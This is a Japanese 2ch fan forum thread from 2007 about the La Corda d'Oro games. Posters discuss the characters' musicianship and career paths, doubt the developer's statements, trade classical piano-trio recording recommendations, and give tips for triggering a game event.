125 :名無しって呼んでいいか?:2007/10/12(金) 04:05:49 ID:???
つか、2の加地と柚木のアンサンブル対立の内用見てると
「そりゃ加地は演奏者としては報われないだろう」と思うわ
清麗に憧れてる、ってあれね

別に自分に無いものに憧れる事自体は普通だけど
加地の場合、自分の特性否定しちゃってるんだもの
柚木に「華があって派手やか」と言われる自分の演奏が嫌いで
それを捨てて、そんなものじゃないもの透明で清らかでどこまでも澄んだ音の持ち主になりたいんだろう

自分の演奏に「満足しない」のは向上心に繋がっていいけど
加地は自分に足りないものを求めるのではなく、自分を否定して別のものになりたがってる
人間誰しも自分以外のものにはなれないんだから、そんな努力など報われないさ
耳がよすぎて、どこまでも理想の音を追求できるからこその悲劇かもね
技術を身につけるのに時間がかかるとかそういうのとはまた別に、加地は「自分らしい音」ではなく
「どこまでも澄んで透明感のある音」が出せない限り加地的には報われた気分になれない気がする
どんな人だって結局は「その人らしい音」しか出せないんだからそれは悲劇だぞ
だったら他の道行った方が加地は苦しくないと思うわ

126 :名無しって呼んでいいか?:2007/10/12(金) 08:26:25 ID:???
>>119
そこで諦めるから、努力する才能がないと言われるのでは
人一倍練習して大成する人はたくさんいる(音楽に限らず)
技術習得に時間がかかるというのは、時間を掛ければ出来るということだし
(実際ゲーム内の対立もそういう風に描かれていることが多い)
どれだけ時間をかけてもやり続けようというほど、演奏家としての自分に執着してなかったんだろう
でも音楽への理想は高いから、聴衆として香穂子に情熱注いでるのかな

127 :名無しって呼んでいいか?:2007/10/12(金) 08:27:25 ID:???
熱いなぁ…

人間誰しも自分以外のもののなれない〜は、ああ見えて加地は聡いから分かってると思う
それでも追いかけたくなるのは分かるから、あれはあれでいいかなと
柚木との対立は微妙だが

128 :名無しって呼んでいいか?:2007/10/12(金) 08:40:26 ID:???
>無印の頃からキャラたちの将来はもう決めていた

嘘くせぇw遙か1を出した時に、ゲーム企画前にアンケ取ったら
今、女性に平安が人気なので平安モチーフにしたゲームを出したってコメントしたくせに
遙か3迷宮で現代舞台にして、元々遙かは時代物にはこだわってなかったんですって前言撤回し
遙か劇場版で新キャラとの恋愛メインのストーリーにしたら
既存キャラファンの反発くらったら、新キャラとは恋愛ではないが
恋と同じくらいの強い気持ちと訳ワカラン発言で掌返しした紅玉なので
コルダでも、また後付けで適当な事言ってるとしか思えないwwww



129 :名無しって呼んでいいか?:2007/10/12(金) 08:47:58 ID:???
いやそこまで言わんでも…他作品関係ないし
多分、進路を決めていたのは事実だろうと思う
ただ、続編をつくるにあたって変更した可能性はあるんじゃないかと思っている

でも、変更したかも?という疑惑があるとしたら土浦以外ないんだよね、
それ以外は比較的真っ当なところだし
となると…今までずっと一人で弾いてた土浦が、他の人の音楽に触れるようになって、
結果指揮者を目指そうとしたというのを当初から設定していたとしても、
それを100%否定は出来ないかも知れないなと思う
ピアノをやってて指揮者志向する例はわりとあるというか、
ピアニストが指揮者でもある例は少なくもない

130 :名無しって呼んでいいか?:2007/10/12(金) 08:48:54 ID:???
嘘と決めつけるのもよくないが、本当かなあと思う面はあるってことだよね要するに

131 :名無しって呼んでいいか?:2007/10/12(金) 08:49:59 ID:???
逆に、本当かなあとは思うが嘘と決めつけるほどのことでもない、ということでもある

132 :名無しって呼んでいいか?:2007/10/12(金) 08:51:04 ID:???
ところでキャラ進路が最初からきまってたってのはソースはなんですか

133 :名無しって呼んでいいか?:2007/10/12(金) 08:51:56 ID:???
紅玉の言うことだし、ハッタリか本当かは分かる人には分かると思う

とりあえず、土浦はピアニスト志望の方が良かったな
餡子をプレイした後だと特にそう思う

134 :名無しって呼んでいいか?:2007/10/12(金) 08:53:18 ID:???
>>133
”わかる人”ってのは何だろうなあ…わかる人ぶってるだけって可能性ないのか?
つーか2chでそれを見分けるのは無理だしな、
本当にわかる人だけ内心わかってりゃいいと思う

135 :名無しって呼んでいいか?:2007/10/12(金) 08:54:08 ID:???
>>132
昨日発売の「電撃GS」に紅玉がコメントしているらしい。

136 :名無しって呼んでいいか?:2007/10/12(金) 08:54:30 ID:???
>>129
唐突な感じは否めないな

137 :名無しって呼んでいいか?:2007/10/12(金) 08:59:24 ID:???
土浦をラフマニノフあたりになぞらえるなら指揮者やっててもおかしくないのかな
リストとかは指揮者やってたっけ?

いや、何となく無印ってキャラを作曲家とか演奏家とかに重ねてた感じがするので
そういう意味でなら、元にしたイメージの中に指揮者設定が入っててもおかしくないなと

138 :名無しって呼んでいいか?:2007/10/12(金) 09:00:04 ID:???
>>135
d
なるほどねー実際読んで主旨を確認したいところだな

139 :名無しって呼んでいいか?:2007/10/12(金) 09:08:41 ID:???
>>129
他作品でも作ってる人間は同じだからな

140 :名無しって呼んでいいか?:2007/10/12(金) 09:16:05 ID:???
>>133
紅玉は案の頃から色々とやらかし続けてる歴史(?)があるからねw

141 :名無しって呼んでいいか?:2007/10/12(金) 09:17:39 ID:???
>>139
あれ?コルダは別チームじゃなかったっけ?

142 :名無しって呼んでいいか?:2007/10/12(金) 09:20:20 ID:???
>>141
案も遙かもコルダもその時によってトップが変わるだけで
中身は殆ど被ってる少人数集団だよ。
入退社で多少の変化はあるけどね。


143 :名無しって呼んでいいか?:2007/10/12(金) 09:21:58 ID:???
あれ?コルダは外注したってきいたけど…

144 :名無しって呼んでいいか?:2007/10/12(金) 09:23:31 ID:???
>>142
元々はソフトウェア5部だったのが潰れて音部と出版部に配属されながら
ゲーム企画立ててたのがまたソフトウェア3部へ移ったんだったよな


145 :名無しって呼んでいいか?:2007/10/12(金) 09:26:12 ID:???
内部事情に詳しいよ的な話はどうでもいい

まあ信じるか信じないかはその人次第
今までついてきた嘘はあるだろうけど、あの部分が嘘かどうかはまた別の話
個人的にはグレーゾーンかな

146 :名無しって呼んでいいか?:2007/10/12(金) 09:26:59 ID:???
>>143
そりゃコルダに限らん
紅玉女には元々ゲーム開発技術はない、奴らは設定考えたり、台詞考えたり、企画を立てるだけ
シナリオ協力やシステム開発は外部会社、外部ライター、外部漫画家を使ってる

147 :名無しって呼んでいいか?:2007/10/12(金) 09:32:21 ID:???
>>136
同意

148 :名無しって呼んでいいか?:2007/10/12(金) 09:50:07 ID:???
無印のおまけの、トリオはうまくいくかで3人が挙げるトリオのCDを探したが、
なかなかみつからないものだな…

149 :名無しって呼んでいいか?:2007/10/12(金) 11:40:13 ID:???
>>145
>まあ信じるか信じないかはその人次第

都市伝説先生思い出したw

150 :名無しって呼んでいいか?:2007/10/12(金) 12:03:47 ID:???
>>148
100万ドルトリオ以外覚えてないが…

ピアノ:ルビンシュタイン
ヴァイオリン:ハイフェッツ
チェロ:フォイアマン
録音史上最も豪華な3人、確かに100万ドルだ…

151 :名無しって呼んでいいか?:2007/10/12(金) 12:19:25 ID:???
>>148
チャイコフスキー ピアノ三重奏曲 Op. 50
「ある偉大な芸術家の思い出のために」BMG BVCC-35095
100万ドルと名乗っていた訳じゃないから
ルービンシュタインで探してみては?

152 :名無しって呼んでいいか?:2007/10/12(金) 12:30:23 ID:???
>>150
スークトリオ、オイストラフトリオ、カザルストリオ、と、100万ドルトリオだね
カザルスは比較的よく見るんだけど、組み合わせがいろいろで、
どれが”カザルストリオ”と呼ばれてるのか店頭ではよくわからず

>>151
ほう、ありがとう
1枚だけみつけたんだけど、確かに100万ドルとは書かれてなかったわ
ちなみに見つけたのはベートーベン+シューベルトのだった
>>151は偉大な芸術家の思い出が入ってるのかな?
あの曲は2の中でも特に好きだから、頑張って探すよ、ありがとう

153 :名無しって呼んでいいか?:2007/10/12(金) 12:35:27 ID:???
百万ドルトリオはメンバー少し変わったりしているんだな、
ルービンシュタインが一番メインっぽいかな、探すなら

154 :名無しって呼んでいいか?:2007/10/12(金) 13:41:41 ID:???
そういえば上の話に戻るけど、土浦をリストに重ねるなら、指揮者もありなんだよなー
(話題に出ていたが、リストも指揮者もやっている)
でも、そのトリオのイベントがあるから何となく、
ルービンシュタインとハイフェッツに土浦と月森を重ねてしまうところもあり、
だから何となく土浦はピアニストになるんだと思っていた

155 :名無しって呼んでいいか?:2007/10/12(金) 13:46:37 ID:???
リストにパガニーニがいたように…
ってセリフあったなぁ

156 :名無しって呼んでいいか?:2007/10/12(金) 13:52:56 ID:???
>>155
あのセリフ、香穂子より月森に対して言う方がしっくりくるんだよね

157 :名無しって呼んでいいか?:2007/10/12(金) 13:58:12 ID:???
月森はパガニーニを重ねるかベートーヴェンを重ねるか難しいところだ
まあイメージ元は複数いると考えるのが妥当だが

香穂子がパガニーニはしっくりこないんだよねー

158 :名無しって呼んでいいか?:2007/10/12(金) 14:01:15 ID:???
パガニーニはなんか違うな
じゃ、何だろう

159 :名無しって呼んでいいか?:2007/10/12(金) 14:03:06 ID:???
紅玉が最初から決めていたかどうかは知らないしどうでもいいが、
無印、2,餡子とプレイし続けてきた一個人の感想としては
土浦指揮者設定はない方が良かったな

160 :名無しって呼んでいいか?:2007/10/12(金) 14:04:02 ID:???
たしかに香穂子がパガニーニってのはキツいなぁ

161 :名無しって呼んでいいか?:2007/10/12(金) 14:04:36 ID:???
無印はプレイしてないけど、アニメのピアニストな土浦は結構好きだった

162 :名無しって呼んでいいか?:2007/10/12(金) 14:14:06 ID:???
進路といえば、王崎がコンクール優勝して…というのも予定通りなのかな
無印の頃は、何となくヴァイオリン教室の先生が似合うと思ってた
いや、演奏家として優秀なのは知ってるけどね

163 :名無しって呼んでいいか?:2007/10/12(金) 14:35:59 ID:???
王崎は音楽の楽しさを広めたいっていうファータ的な考え方だと思ってたから
自分も>>162と同じく先生が似合うと思ってた
海外コンクール優勝とかそっちの方向に持って行ったのは意外だったな

164 :名無しって呼んでいいか?:2007/10/12(金) 14:39:52 ID:???
まああれだ、王崎先輩ってのは地味なようで派手な人だから

165 :名無しって呼んでいいか?:2007/10/12(金) 14:43:31 ID:???
そもそも校内コンクールの優勝者は音楽的成功が約束されるというジンクスが囁かれてて、
そこに登場する前回優勝者だからな
紅玉的には、国際コンクール優勝はガチで既定路線なんだろうと思う

166 :名無しって呼んでいいか?:2007/10/12(金) 14:46:49 ID:???
順位気にする土浦は順位のない指揮者目指して
順位気にしない先輩は順位のあるコンクールで優勝か

167 :名無しって呼んでいいか?:2007/10/12(金) 14:52:23 ID:???
すみません、ちょっと教えてください。
コルダ2の柚木先輩とのイベント「赤い靴」がどうしても起きませんorz
連鎖5クリアしちゃうとだめなんですよね?
いつも「赤い靴」イベントが起きる前に連鎖の5が起きちゃいます。
どうしたらよいか、よければアドバイスお願いします。

168 :名無しって呼んでいいか?:2007/10/12(金) 14:57:20 ID:???
2のwikiがあるから読もうな
片方だけでいいなら一番星を背により先に赤い靴を起こせばいいというのもあるが

169 :名無しって呼んでいいか?:2007/10/12(金) 15:03:32 ID:???
>>167
「一番星を背に」「赤い靴」を両方見る方法も
2wikiに書いてあったよ

170 :167:2007/10/12(金) 15:08:56 ID:???
>>168>>169
レスd!です。
wiki見てきましたが、どうやら評価が高めじゃないと「赤い靴」(4-E)イベントは起きないっぽい?
4-Dは問題なく起きるので、評価を高めてからもう一度チャレンジしてきます。


171 :名無しって呼んでいいか?:2007/10/12(金) 15:12:19 ID:???
>>170
イベントの起こし方の、「4-Dと4-E両方を同時に成功させる方法」を読め

つーかイベントの起こし方の恋愛イベントについての項、誰か書き直さないか?
4-D、Eに評価関係ないし

172 :名無しって呼んでいいか?:2007/10/12(金) 15:13:48 ID:???
じゃあ書き換えるけどいい?

173 :名無しって呼んでいいか?:2007/10/12(金) 15:16:17 ID:???
>>172
お願いする。

174 :名無しって呼んでいいか?:2007/10/12(金) 15:17:03 ID:???
で、書き直したのだが、前から気になっている先頭の文章
「※発売前につき曖昧な部分有り。発売したら訂正お願いします。 」
ってのを削ろうかどうしようか迷って結局残してしまった…

175 :名無しって呼んでいいか?:2007/10/12(金) 15:19:16 ID:???
評価関係ないんだ?
じゃ、ちょっとトライ・・・
ありがとぉ〜〜。

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